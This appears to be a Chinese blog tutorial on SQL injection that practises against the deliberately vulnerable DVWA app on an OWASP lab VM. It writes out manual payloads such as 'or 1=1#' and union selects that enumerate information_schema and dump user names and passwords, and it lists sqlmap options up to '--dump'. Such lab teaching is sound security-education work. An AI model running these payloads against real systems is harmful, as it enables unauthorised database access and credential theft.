【测试开发】--安全渗透测试
1. 安全渗透
1.1 分类
- web数据库安全
- web应用服务器安全(文件上传漏洞、文件包含漏洞)
- web客户端安全(XSS跨站攻击)
2. sql注入
2.1 sql注入介绍
- sql注入在安全问题中排行榜首
- sql注入攻击是输入参数未经过滤,然后直接拼接到sql语句当中解析
- sql注入是一种将sql代码添加到输入参数中,传递到服务器解析并执行的一种攻击手法
2.2 sql注入原理
- 攻击者在页面提交恶意字符
- 服务器未对提交参数进行过滤或者过滤不足
- 攻击者利用拼接sql语句方式获取数据库敏感信息
2.3 sql注入危害
- 数据库泄漏
- 用户数据被非法买卖
- 危害web应用安全
2.4 sql注入实现方式
- 手动
- 查找:注入点
- 输入:sql常用注入组合语法,进行注入
- 自动(工具)
- 工具:扫描注入点
- 输入:自动尝试各种组合语法
3.环境搭建
3.1 vmware虚拟机
3.1.1 作用
- 虚拟机软件,可以使用软件在物理机上安装多个虚拟操作系统(Linux、windows)
- 靶机与渗透剂运行以来VMware软件
VMware下载教程
3.2 靶机(学习使用项目环境)
作用
- 一个Linux虚拟机系统,在这个虚拟机中安装了一些已知漏洞的web应用程序,方便学习
- OWASP靶机安装教程
3.3 渗透机(学习攻击sql注入环境)
作用:
- Kali包含数百种工具,可用于各种信息安全任务,例如渗透测试,安全研究
4. 手动注入
4.1 环境准备
说明:通过靶机web应用程序,练习手动注入
步骤:
-
启动靶机OWASP
-
通过浏览器访问靶机
-
访问OWASP-dvwa项目
-
登陆
-
选择sql注入应用程序
4.2 查找注入点
说明:主要采用单引号,转义字符\,以单引号为主
原理:
#后台程序sql语句
select first_name,last_name from users where user_id = '$id';
#输入单引号('),相当于将sql语句闭合,后面就可以使用附加其他逻辑条件了
select first_name,last_name fro users where user_id = ''';
4.3 逻辑或
4.4 猜测列数
- 通过union
' union select 1,2 #
2. 通过逻辑或
'or 1=1#
4.5 获取数据库、表、列
获取数据库名
' union select 1,database()#
获取表
' union select table_name,1 from information_schema.tables where table_schema='dvwa' #
获取列
' union select column_name,1 from information_schema.columns where table_name='users' #
4.6 获取数据
//1. 获取单个字段数据
' union select user,1 from users#//2. 获取两个字段
' union select user,password from users#
4.7 concat函数
作用:拼接多个字符串为一个字符串
语法:concat(str1,str2,…)
示例:
- 获取users表中user_id,user,password,分为两列显示
select user_id,concat (user,password) from dvwa,users;
- 解决user和password拼接在一起的问题
select user_id,concat('user:',user,' password:',password) from dvwa.users;
- 获取多个字段
' union select user,concat(first_name,' ',last_name,' ',password) from users#
5. 自动注入
5.1 自动注入介绍
说明:自动注入是指利用工具代替人工去完成sql注入操作
工具:sqlmap
5.2 自动注入环境
- 启动靶机
- 启动渗透机
5.3 sqlmap
工具:sqlmap
- 一个开源渗透测试工具
- 自动检测和利用sql注入漏洞并接管数据库服务器
5.3.1 sqlmap基本用法
参数
- -u:扫描的目标url
- –batch:自动处理提示信息
- –cookie:附加cookie参数
步骤
- 扫描注入点
- 获取数据库名
- 获取表名
- 获取字段名
- 获取数据
由于需要登陆,我们首先获取已登录页面的cookie
然后开始扫描注入点
成功注入
5.3.2 sqlmap获取库名
– current-db:查询当前web使用的数据库名
-D:应用指定数据库
运行结果:
5.3.3 sqlmap获取表
– current-db:查询指定库下所有表名(需要先使用-D指定库名)
-T:指定表
运行结果:
5.3.4 sqlmap获取列
– columns:查询指定表下所有字段(需要先使用-T指定表名)
-C:指定字段名
运行结果:
5.3.5 sqlmap获取数据
–dump:下载数据
运行结果:
相关文章:
【测试开发】--安全渗透测试
1. 安全渗透 1.1 分类 web数据库安全web应用服务器安全(文件上传漏洞、文件包含漏洞)web客户端安全(XSS跨站攻击) 2. sql注入 2.1 sql注入介绍 sql注入在安全问题中排行榜首sql注入攻击是输入参数未经过滤,然后直…...
AMEYA360:类比半导体三款车规级新品介绍
类比半导体三款全新车规级智能驱动芯片——HD70504与HD70804四通道高边驱动、HD7004低导通电阻高边驱动以及DR8112直驱马达驱动芯片介绍,进一步扩展了其汽车智能驱动产品的深度与广度。 新品首发,诠释“芯”动未来 HD70504 & HD70804四通道高边驱动芯…...
内衣洗衣机哪个牌子好用?五大硬核宝藏内衣洗衣机推荐
在日常生活中,内衣洗衣机已成为现代家庭必备的重要家电之一。选择一款耐用、质量优秀的内衣洗衣机,不仅可以减少洗衣负担,还能提供高效的洗涤效果。然而,市场上众多内衣洗衣机品牌琳琅满目,让我们往往难以选择。那么&a…...
红酒与未来科技:传统与创新的碰撞
在岁月的长河中,红酒以其深邃的色泽、丰富的口感和不同的文化魅力,成为人类文明中的一颗璀璨明珠。而未来科技,则以其迅猛的发展速度和无限的可能性,领着人类走向一个崭新的时代。当红酒与未来科技相遇,一场传统与创新…...
php快速入门
前言 php是一门脚本语言,可以访问服务器,对数据库增删查改(后台/后端语言) 后台语言:php,java,c,c,python等等 注意:php是操作服务器,不能直接在…...
【排序 - 归并排序】
归并排序(Merge Sort)是一种高效的排序算法,基于分治(Divide and Conquer)策略。它将待排序数组分成两个较小的子数组,分别对它们进行排序,然后将排好序的子数组合并成一个整体有序的数组。归并…...
Appium元素定位(全网详细讲解)(二)
1.appium inspector(定位元素的工具)使用方法 详细介绍: 详细解释: 图标名称说明1Show Element Handles是否显示元素句柄2Select Elements选择元素定位3Tap/Swipe By Coordinates按坐标点击/滑动4Download Screenshot下载屏幕截…...
滑动窗口,最长子序列最好的选择 -> O(N)
最近在学校上短学期课程,做程序设计题,一下子回忆起了大一学数据结构与算法的日子! 这十天我会记录一些做题的心得,今天带来的是对于最长子序列长度题型的解题框架:滑动窗口 本质就是双指针算法: 通过le…...
【Python】已解决:Python安装过程中的报错问题
文章目录 一、分析问题背景二、可能出错的原因三、错误代码示例四、正确解决方法五、注意事项 已解决:Python安装过程中的报错问题 一、分析问题背景 在安装Python 3.9.6(64位)版本时,用户可能会遇到一个报错信息,提…...
C++ STL IO流介绍
目录 一:IO流的继承关系: 二:输入输出功能 1. 基本用法 2. 格式化输入 3.非格式化输入 4. 格式化输出 三:流 1. 字符流 2. 向字符流中写入数据 3. 从字符流中读出数据 4. 清空字符流 5.完整的例子 四:文件…...
华为浏览器,Chrome的平替,插件无缝连接
文章目录 背景插件书签 背景 不知道各位小伙伴有没有这样的痛点,办公电脑、家里的电脑还有手机、平板等,收藏了一个网址或者在手机上浏览了某个网页,保存起来,可是一换平台或者换个电脑,在想要浏览之前收藏的东西&…...
SpringBoot新手快速入门系列教程:前述
我自己是一个SpringBoot新手,花了一天时间学了SpringBoot。大家不要惊讶,前提是我自己已经有了10几年的编程经验精通多门语言,并且在人间最强兵器Chat某T的AI助手帮助下,才能创造一天快速学会一个框架的神话。 当然中间遇到了很多…...
C语言9 指针
目录 指针的声明与初始化 指针运算 指针的加法和减法 指针的比较 指针与数组 通过指针访问数组元素 指针与多维数组 声明指向多维数组的指针 访问多维数组元素 指针数组和数组指针 指针数组 数组指针 字符指针 字符串的定义和字符指针 直接使用字符指针初始化字…...
Floyd判圈算法——寻找重复数(C++)
287. 寻找重复数 - 力扣(LeetCode) 题目描述 给定一个包含 n 1 个整数的数组 nums ,其数字都在 [1, n] 范围内(包括 1 和 n),可知至少存在一个重复的整数。假设 nums 只有 一个重复的整数 ,返…...
面试题目分享
学习目标: 从面试了解自己的不足。 学习内容: 1.你会什么语言? 我该如何回答,我会java,c,c等,在工作中我会用到合适的语言。 牛逼吹的大话 尊敬的面试官,我精通Java和Python&…...
Solana开发之Anchor框架
文章目录 Solana开发之Anchor框架一、什么是Anchor二、安装和使用1. 安装rust2. 安装Solana下载预构建的二进制文件 3. 使用 Anchor 版本管理器 (avm) 进行安装(推荐) 四、Anchor 核心原理Anchor 程序由三部分组成程序的 ID 从哪里…...
界面组件Kendo UI for React 2024 Q2亮点 - 生成式AI集成、设计系统增强
随着最新的2024年第二季度发布,Kendo UI for React为应用程序开发设定了标准,包括生成式AI集成、增强的设计系统功能和可访问的数据可视化。新的2024年第二季度版本为应用程序界面提供了人工智能(AI)提示,从设计到代码的生产力增强、可访问性…...
python输出/sys/class/power_supply/BAT0/电池各项内容
读取 /sys/class/power_supply/BAT0/ 目录下的所有相关文件,并输出其内容: import os# 定义电池信息文件的路径 battery_path = "/sys/class/power_supply/BAT0/"# 读取文件内容的函数 def read_battery_info(file_name):try:with open(os.path.join(battery_path…...
HDFS体系架构文件写入/下载流程
HDFS体系架构 HDFS(Hadoop Distributed File System,Hadoop分布式文件系统)是Hadoop项目中的一个核心组件,旨在以高容错、高吞吐量来处理大规模数据集。它的体系架构由以下几个主要部分组成:Client,NameNo…...
大模型之战进入新赛季,开始卷应用
最近一段时间,国产大模型Kimi彻底火了,而这波爆火,某种意义上也展示了一个问题,即大模型的落地场景可能比技术比拼,更重要。 国产大模型Kimi突然爆火,与Kimi相关的产业链甚至被冠上“Kimi概念股”之名&…...
MySQL8.4.0 LTS安装教程 【小白轻松上手2024年最新长期支持版本MySQL手把手保姆级Windows超详细图文安装教程】
MySQL8.4.0 LTS安装教程 【小白轻松上手2024年最新长期支持版本MySQL手把手保姆级Windows超详细图文安装教程】 MySQL8.4.0前言(版本说明)官网下载MySQL1.访问MySQL官网2. 打开MySQL官网下载页面3. 选择下载类型Select Version【MySQL版本号】Select Ope…...
Linux 例题及详解
1.(yum)以下描述正确的是 A.在Centos中可以使用yum install 命令安装软件包 B.在Centos中可以使用yum uninstall 命令卸载软件包 C.在Centos中可以使用yum list 查看所有可安装软件包 D.在Centos中可以使用yum show查看所有可安装软件包 选项A、C是正确…...
爆款文案管理系统设计
设计一个爆款文案管理系统,目标是帮助营销团队高效地创建、管理并分析吸引人的文案,以提升产品或服务的市场吸引力和销售转化率。以下是一些关键功能和设计考量点: 1. 用户友好界面 简洁直观的界面:确保系统界面清晰,…...
FPGA-Verilog-Vivado-软件使用
这里写目录标题 1 软件配置2 FPGA-7000使用2.1 运行启动方式 1 软件配置 编辑器绑定为Vscode,粘贴VS code运行文件的目录,后缀参数保持不变: 如: D:/Users/xdwu/AppData/Local/Programs/Microsoft VS Code/Code.exe [file name]…...
Ambari Hive 创建函数无权限
作者:櫰木 1、创建udf函数 参考文档:https://blog.csdn.net/helloxiaozhe/article/details/102498567 如果已经编写好,请使用自己的。如果没有请参考以上链接进行udf函数编写。 2、创建函数遇到的问题 由于集群开启了kerberos࿰…...
ARM GEC6818 LCD绘图 实心圆 三角形 五角星 任意区域矩形以及旗帜
要在ARM上实现LCD绘图,可以按照以下步骤进行: 硬件初始化:初始化LCD控制器和相关引脚,配置时钟、分辨率和颜色深度等。 内存映射:将LCD显示区域映射到ARM的内存地址空间中,可以通过ARM的内存映射机制来实现…...
Sentinel-1 Level 1数据处理的详细算法定义(三)
《Sentinel-1 Level 1数据处理的详细算法定义》文档定义和描述了Sentinel-1实现的Level 1处理算法和方程,以便生成Level 1产品。这些算法适用于Sentinel-1的Stripmap、Interferometric Wide-swath (IW)、Extra-wide-swath (EW)和Wave模式。 今天介绍的内容如下&…...
一款永久免费的内网穿透工具——巴比达
近期,一款名为巴比达的内网穿透工具凭借其永久免费的特性,以及卓越的性能与安全性,引起了我的关注。本文将深入探讨巴比达如何通过其独创的技术方案,达到企业级数据通信要求。 WanGooe Tunnel协议 首先,巴比达的核心竞…...
翻译|解开LLMs的神秘面纱:他们怎么能做没有受过训练的事情?
大语言模型(LLMs)通过将深度学习技术与强大的计算资源结合起来,正在彻底改变我们与软件互动的方式。 虽然这项技术令人兴奋,但许多人也担忧LLMs可能生成虚假的、过时的或有问题的信息,他们有时甚至会产生令人信服的幻…...
代码随想录-DAY⑦-字符串——leetcode 344 | 541 | 151
344 思路 没啥好说的, 双指针头尾交换, 相遇结束。 时间复杂度:O(n) 空间复杂度:O(1) 代码 class Solution { public:void reverseString(vector<char>& s) {int left0, rights.size()-1;while(left<right){swa…...
喀什网站建设公司/一键生成原创文案
Processing入门简介 http://blog.csdn.net/mysunnytime/article/details/16104723 Processing官方教程 https://processing.org/tutorials/gettingstarted/ Processing程序中重写了两个函数:setup()和draw()。 setup()是在程序开始时调用的函数,只执…...
县门户网站建设方案/自己建个网站要多少钱
this this 是自身的一个对象,代表对象本身,可以理解为:指向对象本身的一个指针。 this 的用法在 java 中大体可以分为 3 种: 普通的直接引用 这种就不用讲了,this 相当于是指向当前对象本身。 形参与成员名字重名&…...
做壮阳药网站/站长工具seo下载
目前 chromium 可以编译android 版,但是只能够build 出来部分测试程序如下: -rwxr-xr-x 1 yajun yajun 52M 2012-03-15 11:14 base_unittests* -rwxr-xr-x 1 yajun yajun 13M 2012-03-15 15:33 base_unittests_36332442B4AA00EC_stripped* -rw-r--r-- 2 …...
网站后期维护包括/邯郸网站优化
转载请标明出处:http://blog.csdn.net/lmj623565791/article/details/42965779 ,本文出自:【张鸿洋的博客】1、概述哈,记得以前写过Android SurfaceView实战 打造抽奖转盘 , 同属于SurfaceView系列,基本可以…...
教育网站开发价钱/站内seo内容优化包括
摘要: ITSM,ITIL这些词越来越热门。 有人认为这是一种新的技术,有人认为ITSM不过是MIS的一种应用,也有人认为无非是网管+工作流。 其实ITSM的出现应该放在整个IT行业发展的过程中来看。可以说,ITSM的出现映射着IT行业的…...
学校网站系统破解版/推广app用什么平台比较好
作者 | kbsc13来源 | 机器学习与计算机视觉(ID:AI_Developer)上周结束了如何构造一个机器学习项目的系列文章,当然还有一篇简单的总结以及介绍一些入门的学习资料,不过还在整理,应该这周内会整理好的。现在…...